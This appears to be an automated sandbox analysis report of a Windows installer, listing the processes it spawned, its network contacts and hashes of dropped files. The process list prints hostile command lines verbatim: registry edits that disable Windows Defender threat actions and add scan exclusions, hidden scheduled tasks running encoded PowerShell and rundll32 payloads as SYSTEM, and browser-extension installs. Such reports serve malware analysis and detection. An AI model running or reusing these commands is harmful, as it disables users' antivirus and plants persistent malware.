"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147807942 /t REG_SZ /d 6 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735735 /t REG_SZ /d 6 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735735 /t REG_SZ /d 6 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737010 /t REG_SZ /d 6 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737010 /t REG_SZ /d 6 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737007 /t REG_SZ /d 6 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737007 /t REG_SZ /d 6 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737503 /t REG_SZ /d 6 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737503 /t REG_SZ /d 6 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749376 /t REG_SZ /d 6 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749376 /t REG_SZ /d 6 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737394 /t REG_SZ /d 6 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737394 /t REG_SZ /d 6 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147841147 /t REG_SZ /d 6 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147841147 /t REG_SZ /d 6 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 359386 /t REG_SZ /d 6 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 359386 /t REG_SZ /d 6 /reg:64

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\CxyVDACQkgMCyKCFbBR\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\CxyVDACQkgMCyKCFbBR\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\IgAQuzzvNCUn\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\IgAQuzzvNCUn\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\YrliKKkuhgWU2\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\YrliKKkuhgWU2\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\orRvbnhdU\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\orRvbnhdU\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\ycfBUKIjHxeOC\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\ycfBUKIjHxeOC\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\ProgramData\qgjSpVnHOWlNdqVB\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\ProgramData\qgjSpVnHOWlNdqVB\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Extensions\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Extensions\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Temp\mONaQiMaftsWsACiF\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Temp\mONaQiMaftsWsACiF\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Windows\Temp\lwSRcZKonRlOofsg\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Windows\Temp\lwSRcZKonRlOofsg\" /t REG_DWORD /d 0 /reg:64;"

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\system32\cmd.exe" /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\CxyVDACQkgMCyKCFbBR" /t REG_DWORD /d 0 /reg:32

C:\Windows\SysWOW64\reg.exe

REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\CxyVDACQkgMCyKCFbBR" /t REG_DWORD /d 0 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\CxyVDACQkgMCyKCFbBR" /t REG_DWORD /d 0 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\IgAQuzzvNCUn" /t REG_DWORD /d 0 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\IgAQuzzvNCUn" /t REG_DWORD /d 0 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\YrliKKkuhgWU2" /t REG_DWORD /d 0 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\YrliKKkuhgWU2" /t REG_DWORD /d 0 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\orRvbnhdU" /t REG_DWORD /d 0 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\orRvbnhdU" /t REG_DWORD /d 0 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\ycfBUKIjHxeOC" /t REG_DWORD /d 0 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\ycfBUKIjHxeOC" /t REG_DWORD /d 0 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\ProgramData\qgjSpVnHOWlNdqVB /t REG_DWORD /d 0 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\ProgramData\qgjSpVnHOWlNdqVB /t REG_DWORD /d 0 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Users\Admin\AppData\Local\Temp\mONaQiMaftsWsACiF /t REG_DWORD /d 0 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Users\Admin\AppData\Local\Temp\mONaQiMaftsWsACiF /t REG_DWORD /d 0 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Windows\Temp\lwSRcZKonRlOofsg /t REG_DWORD /d 0 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Windows\Temp\lwSRcZKonRlOofsg /t REG_DWORD /d 0 /reg:64

C:\Windows\SysWOW64\schtasks.exe

schtasks /CREATE /TN "gUFbOeYUT" /SC once /ST 10:54:16 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="

C:\Windows\SysWOW64\schtasks.exe

schtasks /run /I /tn "gUFbOeYUT"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==

C:\Windows\system32\gpupdate.exe

"C:\Windows\system32\gpupdate.exe" /force

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -s WPDBusEnum

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s fhsvc

C:\Windows\system32\gpscript.exe

gpscript.exe /RefreshSystemParam

C:\Windows\SysWOW64\schtasks.exe

schtasks /DELETE /F /TN "gUFbOeYUT"

C:\Windows\SysWOW64\schtasks.exe

schtasks /CREATE /TN "aUYdFpynDtMaquqaO" /SC once /ST 13:57:33 /RU "SYSTEM" /TR "\"C:\Windows\Temp\lwSRcZKonRlOofsg\WtQmCBDEFrzsRrg\zxEzzCo.exe\" F0 /Ggsite_idYxJ 385118 /S" /V1 /F

C:\Windows\SysWOW64\schtasks.exe

schtasks /run /I /tn "aUYdFpynDtMaquqaO"

C:\Windows\Temp\lwSRcZKonRlOofsg\WtQmCBDEFrzsRrg\zxEzzCo.exe

C:\Windows\Temp\lwSRcZKonRlOofsg\WtQmCBDEFrzsRrg\zxEzzCo.exe F0 /Ggsite_idYxJ 385118 /S

C:\Windows\SysWOW64\schtasks.exe

schtasks /DELETE /F /TN "bEcIFlOHxifjjBuFoU"

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\System32\cmd.exe" /C forfiles /p c:\windows\system32 /m cmd.exe /c "cmd /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=exe Force=True" &

C:\Windows\SysWOW64\schtasks.exe

schtasks /CREATE /TR "rundll32 \"C:\Program Files (x86)\orRvbnhdU\cJnNzB.dll\",#1" /RU "SYSTEM" /SC ONLOGON /TN "yozVwwMRZiDXbVH" /V1 /F

C:\Windows\SysWOW64\forfiles.exe

forfiles /p c:\windows\system32 /m cmd.exe /c "cmd /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=exe Force=True"

C:\Windows\SysWOW64\cmd.exe

/C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=exe Force=True

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=exe Force=True

C:\Windows\SysWOW64\Wbem\WMIC.exe

"C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=exe Force=True

C:\Windows\SysWOW64\schtasks.exe

schtasks /CREATE /TN "yozVwwMRZiDXbVH2" /F /xml "C:\Program Files (x86)\orRvbnhdU\BoIyvtW.xml" /RU "SYSTEM"

C:\Windows\SysWOW64\schtasks.exe

schtasks /END /TN "yozVwwMRZiDXbVH"

C:\Windows\SysWOW64\schtasks.exe

schtasks /DELETE /F /TN "yozVwwMRZiDXbVH"

C:\Windows\SysWOW64\schtasks.exe

schtasks /CREATE /TN "UQeOhhowVzyRxe" /F /xml "C:\Program Files (x86)\YrliKKkuhgWU2\vqoJCaF.xml" /RU "SYSTEM"

C:\Windows\SysWOW64\schtasks.exe

schtasks /CREATE /TN "URgAKlFGIJbNQ2" /F /xml "C:\ProgramData\qgjSpVnHOWlNdqVB\UTmTfNY.xml" /RU "SYSTEM"

C:\Windows\SysWOW64\schtasks.exe

schtasks /CREATE /TN "jnXffsNCSkeAQyNEq2" /F /xml "C:\Program Files (x86)\CxyVDACQkgMCyKCFbBR\dbotFoU.xml" /RU "SYSTEM"

C:\Windows\SysWOW64\schtasks.exe

schtasks /CREATE /TN "KAKzgitjhEJqniBRVYG2" /F /xml "C:\Program Files (x86)\ycfBUKIjHxeOC\DSqYrZi.xml" /RU "SYSTEM"

C:\Windows\SysWOW64\schtasks.exe

schtasks /CREATE /TN "YGcJOiVocZfwUgdee" /SC once /ST 06:58:15 /RU "SYSTEM" /TR "rundll32 \"C:\Windows\Temp\lwSRcZKonRlOofsg\ikuFnJEA\uKkhvGx.dll\",#1 /FIsite_idzJb 385118" /V1 /F

C:\Windows\SysWOW64\schtasks.exe

schtasks /run /I /tn "YGcJOiVocZfwUgdee"

C:\Windows\system32\rundll32.EXE

C:\Windows\system32\rundll32.EXE "C:\Windows\Temp\lwSRcZKonRlOofsg\ikuFnJEA\uKkhvGx.dll",#1 /FIsite_idzJb 385118

C:\Windows\SysWOW64\rundll32.exe

C:\Windows\system32\rundll32.EXE "C:\Windows\Temp\lwSRcZKonRlOofsg\ikuFnJEA\uKkhvGx.dll",#1 /FIsite_idzJb 385118

C:\Windows\SysWOW64\schtasks.exe

schtasks /DELETE /F /TN "aUYdFpynDtMaquqaO"

C:\Windows\SysWOW64\schtasks.exe

schtasks /DELETE /F /TN "YGcJOiVocZfwUgdee"

Network

Country Destination Domain Proto
US 8.8.8.8:53 28.118.140.52.in-addr.arpa udp
US 8.8.8.8:53 240.197.17.2.in-addr.arpa udp
US 8.8.8.8:53 71.159.190.20.in-addr.arpa udp
US 138.91.171.81:80 tcp
US 8.8.8.8:53 104.219.191.52.in-addr.arpa udp
US 8.8.8.8:53 183.59.114.20.in-addr.arpa udp
US 8.8.8.8:53 18.31.95.13.in-addr.arpa udp
US 8.8.8.8:53 28.143.109.104.in-addr.arpa udp
US 8.8.8.8:53 159.113.53.23.in-addr.arpa udp
US 8.8.8.8:53 79.121.231.20.in-addr.arpa udp
N/A 224.0.0.251:5353 udp
US 8.8.8.8:53 249.197.17.2.in-addr.arpa udp
US 8.8.8.8:53 service-domain.xyz udp
US 3.80.150.121:443 service-domain.xyz tcp
US 8.8.8.8:53 121.150.80.3.in-addr.arpa udp
US 8.8.8.8:53 74.90.14.23.in-addr.arpa udp
US 8.8.8.8:53 11.97.55.23.in-addr.arpa udp
US 8.8.8.8:53 202.184.250.142.in-addr.arpa udp
US 8.8.8.8:53 99.18.217.172.in-addr.arpa udp
US 8.8.8.8:53 clients2.google.com udp
DE 216.58.206.46:443 clients2.google.com tcp
US 8.8.8.8:53 clients2.googleusercontent.com udp
DE 142.250.186.65:443 clients2.googleusercontent.com tcp
US 8.8.8.8:53 65.186.250.142.in-addr.arpa udp
US 8.8.8.8:53 46.206.58.216.in-addr.arpa udp
DE 216.58.206.46:443 clients2.google.com tcp
US 8.8.8.8:53 api2.check-data.xyz udp
US 44.239.141.158:80 api2.check-data.xyz tcp
US 8.8.8.8:53 158.141.239.44.in-addr.arpa udp

Files

C:\Users\Admin\AppData\Local\Temp\7zS3DF3.tmp\Install.exe

MD5 6248fde83e7929ff0561fd033b68d11c
SHA1 2ad27e8ca39e8717981c1ed451cbddcef1a8334c
SHA256 66959c9da38234dc5a24b2771036a50b47ec531c1bb0cdf7383952c6a6ccb884
SHA512 80bcb48b79563e92880f2d458f4d8f0ea95ba6319054ebc9559b76e108ca76da9d37e259635a1f727084741e2bfb13a9f93c0b5dbe1aaf720d652ea0165a3f33

memory/3208-8-0x0000000000E30000-0x00000000014EE000-memory.dmp

memory/3208-9-0x0000000010000000-0x00000000105D3000-memory.dmp

memory/544-13-0x0000000073240000-0x00000000739F0000-memory.dmp

memory/544-12-0x0000000004930000-0x0000000004966000-memory.dmp

memory/544-14-0x0000000000C80000-0x0000000000C90000-memory.dmp

memory/544-16-0x0000000004FA0000-0x00000000055C8000-memory.dmp

memory/544-15-0x0000000000C80000-0x0000000000C90000-memory.dmp

memory/544-17-0x0000000004ED0000-0x0000000004EF2000-memory.dmp

memory/544-18-0x00000000057C0000-0x0000000005826000-memory.dmp

memory/544-19-0x0000000005830000-0x0000000005896000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_4jmtjf35.to3.ps1

MD5 d17fe0a3f47be24a6453e9ef58c94641
SHA1 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

memory/544-29-0x00000000059D0000-0x0000000005D24000-memory.dmp

memory/544-30-0x0000000005ED0000-0x0000000005EEE000-memory.dmp

memory/544-31-0x0000000005F20000-0x0000000005F6C000-memory.dmp

memory/544-34-0x0000000073240000-0x00000000739F0000-memory.dmp

memory/3208-38-0x0000000000E30000-0x00000000014EE000-memory.dmp

memory/4456-40-0x0000000000C70000-0x000000000132E000-memory.dmp

memory/4456-41-0x0000000010000000-0x00000000105D3000-memory.dmp

memory/3052-44-0x0000000073330000-0x0000000073AE0000-memory.dmp

memory/3052-46-0x00000000036A0000-0x00000000036B0000-memory.dmp

memory/3052-45-0x00000000036A0000-0x00000000036B0000-memory.dmp

memory/3052-56-0x00000000047E0000-0x0000000004B34000-memory.dmp

memory/3052-57-0x0000000004C20000-0x0000000004C6C000-memory.dmp

memory/3052-60-0x0000000073330000-0x0000000073AE0000-memory.dmp

C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.exe.log

MD5 28854213fdaa59751b2b4cfe772289cc
SHA1 fa7058052780f4b856dc2d56b88163ed55deb6ab
SHA256 7c65fe71d47e0de69a15b95d1ee4b433c07a1d6f00f37dd32aee3666bb84a915
SHA512 1e2c928242bdef287b1e8afe8c37427cfd3b7a83c37d4e00e45bcbaa38c9b0bf96f869a062c9bc6bb58ecd36e687a69b21d5b07803e6615a9b632922c1c5ace4

memory/4928-62-0x0000000073330000-0x0000000073AE0000-memory.dmp

memory/4928-63-0x0000000001B50000-0x0000000001B60000-memory.dmp

memory/4928-64-0x0000000001B50000-0x0000000001B60000-memory.dmp

C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 8a6c3c61bbc81c19401654951e4ebed6
SHA1 d5dfe9c03d1c0dd76daa9fad7f78be758390700f
SHA256 ec4af60b0419302df816d665908de228c45716605d19065e0bd9471cb8b710d9
SHA512 8bd3ec9ebe2921eb01204d2bcb67da8c050519a3e19ffb1f23482570df3aae55cbe1a79938582f9d4edd4e63647571e0c19b0d99a7538f97a1002e14f22e65ad

memory/4928-76-0x0000000073330000-0x0000000073AE0000-memory.dmp

memory/696-79-0x00007FFB19E30000-0x00007FFB1A8F1000-memory.dmp

memory/696-80-0x0000019299AF0000-0x0000019299B00000-memory.dmp

memory/696-81-0x00000192FF880000-0x00000192FF8A2000-memory.dmp

memory/696-91-0x0000019299AF0000-0x0000019299B00000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 903c54d0f62b7011825a451f5a81ede3
SHA1 066a02609a2f69af6cc2ec6e961392b6256c58cf
SHA256 ec18b54a6c89301b21d9cdfefb1a563fea05c0c40764308647d65f79436d1c86
SHA512 95ee65dd3d5df495cc7eb78cda883150138a38e0ec396c4a30e9659120301372ec4d2943eee5ce702d5a2c52f78e3368ccf51c671ab5bc472e2e4a82fe2004fb

memory/696-95-0x00007FFB19E30000-0x00007FFB1A8F1000-memory.dmp

memory/4456-96-0x0000000000C70000-0x000000000132E000-memory.dmp

memory/4456-101-0x0000000000C70000-0x000000000132E000-memory.dmp

memory/4628-102-0x00000000009F0000-0x00000000010AE000-memory.dmp

memory/4628-103-0x0000000010000000-0x00000000105D3000-memory.dmp

memory/4628-114-0x00000000023B0000-0x0000000002435000-memory.dmp

memory/2536-115-0x0000000072F80000-0x0000000073730000-memory.dmp

memory/2536-118-0x0000000003C80000-0x0000000003C90000-memory.dmp

memory/2536-122-0x0000000004C00000-0x0000000004F54000-memory.dmp

C:\Program Files\Mozilla Firefox\browser\features\{85FD6ACE-3736-491B-8514-6C8C9556E131}.xpi

MD5 68ec4c9163e8df51afda69a05eac9b8a
SHA1 8d9094bfaf0669d7d40f31a839c3844720bfcc88
SHA256 33377d4dd62efc7a3bfb480d44b98008c9ffbe20cc102b70d9bf03e9028609c9
SHA512 4d52b0a351a078f32b7ef3e19420f86bc1b835a9b45bff354cfc625c88792d21db7f8d0898ab66cefb5ca6bab47478da275d34cf851c14acb6453cdb6edce573

C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 678449db0c19440d6e80f5b233fea5be
SHA1 57ac3f8e4db80d8980020252e8e412271c2157b6
SHA256 a58e6cbd6749cf00d2bd5d8f82ac5c89d2c3534f2e75a5f80bbf88e159e4fd25
SHA512 9d1864417c240930e65e2e00a84863e93681bb2e1dc0b65fa4e57d79c8c5906d7eb46e62e5b9d2b51046a69f56e31703c0ad9e9c6a0fc958df945ff7041d7baa

memory/2536-160-0x00000000057F0000-0x000000000583C000-memory.dmp

memory/2536-165-0x0000000072F80000-0x0000000073730000-memory.dmp

memory/4628-172-0x0000000002CD0000-0x0000000002D34000-memory.dmp

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\agcghmjnenlfcjmnldooeaadankclolo\1.4_0\_locales\fa\messages.json

MD5 238d2612f510ea51d0d3eaa09e7136b1
SHA1 0953540c6c2fd928dd03b38c43f6e8541e1a0328
SHA256 801162df89a8ad2b1a51de75e86eba3958b12960660960a5ffafe9bc55bc293e
SHA512 2630dd7a3c17dc963b1a71d81295cf22f8b3838748b55c433318e1e22f5b143a6d374ca2e5a8420659fa130200fbaa4814d0f093b1eca244b5635a3b99878e1c

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\agcghmjnenlfcjmnldooeaadankclolo\1.4_0\_locales\en_GB\messages.json

MD5 2a1e12a4811892d95962998e184399d8
SHA1 55b0ae8a7b5a5d6094827ede8e6a1d26d4b4a720
SHA256 32b4406692c26b540fea815a9bb56df1f164140cd849e8025930b7425036cceb
SHA512 bb54d5e8684a6bfeac559b7c7a7551eed6a8a43a4c6464218cb0adb1c89fea124b69760690c3124af86fa68ac3fdbe903eaa098f0af2b6a58f4702c803abc089

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\agcghmjnenlfcjmnldooeaadankclolo\1.4_0\_locales\pt_BR\messages.json

MD5 0b1cf3deab325f8987f2ee31c6afc8ea
SHA1 6a51537cef82143d3d768759b21598542d683904
SHA256 0ec437af3f59fef30355cf803966a2b9a0cd9323d390297496f750775995a6bf
